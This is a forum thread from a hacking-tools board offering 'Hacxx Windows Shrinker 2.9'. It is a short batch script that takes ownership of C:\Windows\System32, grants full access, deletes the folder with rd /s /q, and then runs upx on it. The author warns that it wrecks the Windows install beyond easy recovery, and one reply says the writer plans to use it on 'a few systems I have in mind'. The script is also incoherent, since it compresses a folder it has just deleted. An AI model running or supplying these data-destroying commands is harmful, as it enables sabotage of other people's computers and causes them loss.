![]() |
|
Hacxx Windows Shrinker 2.9 - Printable Version +- Sinisterly (https://sinister.ly) +-- Forum: Hacking (https://sinister.ly/Forum-Hacking) +--- Forum: Hacking Tools (https://sinister.ly/Forum-Hacking-Tools) +--- Thread: Hacxx Windows Shrinker 2.9 (/Thread-Hacxx-Windows-Shrinker-2-9) |
Hacxx Windows Shrinker 2.9 - hacxx - 01-31-2022 REQUIRE ADMIN Code: takeown /R /A /F C:\Windows\System32 /D N
icacls C:\Windows\System32 /grant Administrators:F /T /C
rd /s /q C:\Windows\system32
upx -9 C:\Windows\system32WARNING: This may damage your Windows Install and the user most likely won't be able to recover. RE: Hacxx Windows Shrinker 2.9 - mothered - 02-01-2022 Quote:This may damage your Windows Install and the user most likely won't be able to recover.Interesting. Are you saying It will also damage the recovery partition? RE: Hacxx Windows Shrinker 2.9 - hacxx - 02-01-2022 (02-01-2022, 01:31 AM)mothered Wrote: Are you saying It will also damage the recovery partition? No. The code will damage the current Windows install. RE: Hacxx Windows Shrinker 2.9 - mothered - 02-01-2022 (02-01-2022, 04:57 AM)hacxx Wrote:I thought as much when looking at the code Itself.(02-01-2022, 01:31 AM)mothered Wrote: Are you saying It will also damage the recovery partition? Thanks for confirming It. RE: Hacxx Windows Shrinker 2.9 - hacxx - 02-01-2022 (02-01-2022, 09:03 AM)mothered Wrote: I thought as much when looking at the code Itself. The code removes system privileges to c:\windows\system32 and grant full access to Administrators. The last line will upx all exes. (You need to have upx.exe on the same folder as this batch). RE: Hacxx Windows Shrinker 2.9 - mothered - 02-01-2022 (02-01-2022, 12:15 PM)hacxx Wrote: The code removes system privileges to c:\windows\system32 and grant full access to Administrators.Such a simple code, yet very effective. I'm going to have a lot of fun with It on a few systems I have In mind. |